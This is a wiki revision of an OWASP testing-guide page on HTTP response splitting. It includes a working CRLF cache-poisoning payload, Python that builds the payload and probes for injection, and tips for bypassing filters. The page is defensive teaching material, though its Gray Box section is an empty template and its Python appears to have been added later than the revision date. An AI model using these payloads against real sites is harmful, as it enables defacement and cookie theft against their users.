Difference between revisions of "Testing for HTTP Splitting/Smuggling (OWASP-DV-016)"

From OWASP
Revision as of 16:55, 4 December 2006

Brief Summary

In this chapter we illustrate attacks that leverage specific features of the HTTP protocol, either by exploiting weaknesses of the web application or by exploiting peculiarities in the way different agents interpret HTTP messages.

Description of the Issue

We will analyze two different attacks that target specific HTTP headers: HTTP splitting and HTTP smuggling. The first attack exploits a lack of input sanitization that allows an intruder to insert CR and LF characters into the headers of the application response and to 'split' that answer into two different HTTP messages. The goal of the attack can vary from cache poisoning to cross-site scripting. In the second attack, the attacker exploits the fact that some specially crafted HTTP messages can be parsed and interpreted in different ways depending on the agent that receives them. HTTP smuggling requires some knowledge of the different agents that handle the HTTP messages (web server, proxy, firewall) and is therefore covered only in the Gray Box testing section.

Black Box testing and Examples

HTTP Splitting

Some web applications use part of the user input to generate the values of some headers of their responses. The most straightforward example is a redirection in which the target URL depends on some user-submitted value. Let's say, for instance, that the user is asked to choose whether he/she prefers a standard or an advanced web interface. That choice is passed as a parameter that is used in the response header to trigger the redirection to the corresponding page. More specifically, if the parameter 'interface' has the value 'advanced', the application will answer with the following:

HTTP/1.1 302 Moved Temporarily
Date: Sun, 03 Dec 2005 16:22:19 GMT
Location: http://victim.com/main.jsp?interface=advanced
<snip>
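
To make the root cause concrete, here is a minimal sketch of how such a redirect might be produced on the server side. The function name `build_redirect` is hypothetical and the response is reduced to the status line and the Location header. It is not taken from any real application; it only illustrates user input being concatenated into a header without any filtering.

```python
def build_redirect(interface: str) -> str:
    """Return a raw 302 response whose Location header embeds `interface` verbatim.

    Hypothetical, deliberately vulnerable: the value is not checked for CR/LF.
    """
    location = "http://victim.com/main.jsp?interface=" + interface
    return (
        "HTTP/1.1 302 Moved Temporarily\r\n"
        f"Location: {location}\r\n"
        "\r\n"
    )


if __name__ == "__main__":
    # With a benign value, the response contains exactly one Location header.
    print(build_redirect("advanced"))
```

Because the value is copied as-is, any CR or LF characters it contains end up in the header section of the response.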

When receiving this message, the browser will bring the user to the page indicated in the Location header. However, if the application does not filter the user input, it will be possible to insert into the 'interface' parameter the sequence %0d%0a, which represents the CRLF sequence used to separate lines. At this point, we will be able to trigger a response that will be interpreted as two different responses by anybody who happens to parse it, for instance a web cache sitting between us and the application. An attacker can leverage this to poison the web cache so that it will serve false content in response to all subsequent requests. Let's say that in our previous example the pen-tester passes the following data as the interface parameter:

advanced%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2031%0d%0a%0d%0a<html>Sorry,%20System%20Down</html>

The resulting answer from the vulnerable application will therefore be the following (the application URL-decodes the whole parameter, so the injected body is 31 bytes long):

HTTP/1.1 302 Moved Temporarily
Date: Sun, 03 Dec 2005 16:22:19 GMT
Location: http://victim.com/main.jsp?interface=advanced
Content-Length: 0

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 31

<html>Sorry, System Down</html>
<other data>
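
The following sketch shows one way to reproduce the example offline. It builds an equivalent payload, simulates the unfiltered redirect, and then splits the resulting stream the way an agent that frames messages by Content-Length might. All function names are hypothetical, the Content-Length of the injected response is computed from the decoded body, and the parser is a simplification rather than a model of any particular cache.

```python
from urllib.parse import quote, unquote

BODY = "<html>Sorry, System Down</html>"


def build_payload(body: str) -> str:
    """URL-encode a value that closes the first response and opens a second one."""
    injected = (
        "advanced\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
        "HTTP/1.1 200 OK\r\n"
        "Content-Type: text/html\r\n"
        f"Content-Length: {len(body.encode())}\r\n"
        "\r\n"
        f"{body}"
    )
    # quote() emits upper-case hex (%0D%0A), which is equivalent to %0d%0a.
    return quote(injected, safe="/:<>,")


def split_messages(raw: str) -> list:
    """Split a raw stream into HTTP messages using Content-Length framing."""
    messages = []
    rest = raw
    while rest.startswith("HTTP/"):
        head, sep, tail = rest.partition("\r\n\r\n")
        if not sep:
            break
        length = 0
        for line in head.split("\r\n")[1:]:
            name, _, value = line.partition(":")
            if name.strip().lower() == "content-length":
                length = int(value.strip())
        # The body is ASCII here, so character count equals byte count.
        messages.append(head + sep + tail[:length])
        rest = tail[length:]
    return messages


payload = build_payload(BODY)
# Simulated vulnerable application: decodes the parameter and copies it
# into the Location header without filtering CR/LF.
raw_response = (
    "HTTP/1.1 302 Moved Temporarily\r\n"
    "Location: http://victim.com/main.jsp?interface=" + unquote(payload) + "\r\n"
    "\r\n"
)
messages = split_messages(raw_response)

if __name__ == "__main__":
    print(payload)
    print(len(messages), "messages seen by the parser")
```

The trailing CRLFs that the application appends after the injected value play the role of the leftover data in the example above: they follow the second message and are not part of it.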

The web cache will see two different responses, so if the attacker sends, immediately after the first request, a second one asking for /index.html, the web cache will match this request with the second response and cache its content. All subsequent requests for victim.com/index.html passing through that web cache will then receive the "system down" message. In this way, an attacker would be able to effectively deface the site for all users of that web cache (the whole Internet, if the web cache is a reverse proxy for the web application). Alternatively, the attacker could pass to those users a JavaScript snippet that steals their cookies, mounting a Cross Site Scripting attack. Note that while the vulnerability is in the application, the targets here are its users.

Therefore, in order to look for this vulnerability, the tester needs to identify all user-controlled input that influences one or more headers in the response, and check whether he/she can successfully inject a CR+LF sequence into it. The headers that are the most likely candidates for this attack are:

  • Location
  • Set-Cookie
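
The check described above can be sketched as follows. The idea is to inject a harmless marker header after a CRLF and then look for it as a header line of its own in the raw response. The marker name `X-Crlf-Probe` and both function names are assumptions made for illustration; how the request is sent and how the raw response is captured is left to the tester's tooling.

```python
from urllib.parse import quote

MARKER_NAME = "X-Crlf-Probe"  # hypothetical marker header
MARKER_VALUE = "1"


def build_probe(value: str) -> str:
    """Return a URL-encoded parameter value that tries to inject the marker header."""
    return quote(f"{value}\r\n{MARKER_NAME}: {MARKER_VALUE}", safe="")


def header_injected(raw_response: bytes) -> bool:
    """True if the marker appears as a separate header line in the raw response."""
    head, _, _ = raw_response.partition(b"\r\n\r\n")
    for line in head.split(b"\r\n")[1:]:  # skip the status line
        name, sep, value = line.partition(b":")
        if (
            sep
            and name.strip().lower() == MARKER_NAME.lower().encode()
            and value.strip() == MARKER_VALUE.encode()
        ):
            return True
    return False


if __name__ == "__main__":
    print(build_probe("advanced"))
```

If the application encodes or strips the CRLF, the marker stays inside the Location (or Set-Cookie) value and `header_injected` returns False. If the CRLF passes through unfiltered, the marker shows up as an independent header.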

It must be noted that a successful exploitation of this vulnerability in a real world scenario can be quite complex, as several factors must be taken into account:

  1. The pen-tester must properly set the headers in the fake response for it to be successfully cached (e.g.: a Last-Modified header with a date set in the future). He/she might also have to destroy previously cached versions of the target pages, by issuing a preliminary request with "Pragma: no-cache" in the request headers.
  2. The application, while not filtering the CR+LF sequence, might filter other characters that are needed for a successful attack (e.g.: "<" and ">"). In this case, the tester can try to use other encodings (e.g.: UTF-7).
  3. Some targets (e.g.: ASP) will URL-encode the path part of the Location header (e.g.: www.victim.com/redirect.asp), making a CRLF sequence useless. However, they fail to encode the query section (e.g.: ?interface=advanced), meaning that a leading question mark is enough to bypass this problem.
  4. Different targets can use different methods to decide when the first HTTP message ends and when the second starts. Some will use the message boundaries, as in the previous example. Others will allocate for each message a number of chunks of predetermined length: in this case, the second message will have to start exactly at the beginning of a chunk and this will require the tester to use padding between the two messages. Other targets will assume that different messages will be carried by different packets.
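
Two of the factors above lend themselves to small helpers, sketched here under stated assumptions. The first produces a Last-Modified value set in the future, as in point 1. The second computes how many padding bytes are needed so that the second message starts exactly at a chunk boundary, as in point 4. The function names are hypothetical, and the chunk size is not something this sketch can know: it depends on the target and must be determined by the tester.

```python
from datetime import datetime, timedelta, timezone
from email.utils import format_datetime


def future_last_modified(days_ahead: int = 365) -> str:
    """Return an HTTP date `days_ahead` days from now, for a Last-Modified header."""
    when = datetime.now(timezone.utc) + timedelta(days=days_ahead)
    # usegmt=True yields the "GMT" suffix used in HTTP dates.
    return format_datetime(when, usegmt=True)


def padding_needed(first_message_len: int, chunk_size: int) -> int:
    """Bytes of padding required so the next message starts on a chunk boundary."""
    if chunk_size <= 0:
        raise ValueError("chunk_size must be positive")
    return (-first_message_len) % chunk_size


if __name__ == "__main__":
    print("Last-Modified:", future_last_modified())
    print("padding:", padding_needed(100, 64))
```

Where the padding actually goes depends on how the target consumes the stream, so the returned number is only a starting point for experimentation.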

For a more detailed discussion of this attack and of possible scenarios and applications, check the corresponding paper referenced at the bottom of this page.

Gray Box testing and example

Testing for Topic X vulnerabilities:
...
Result Expected:
...

References

Whitepapers

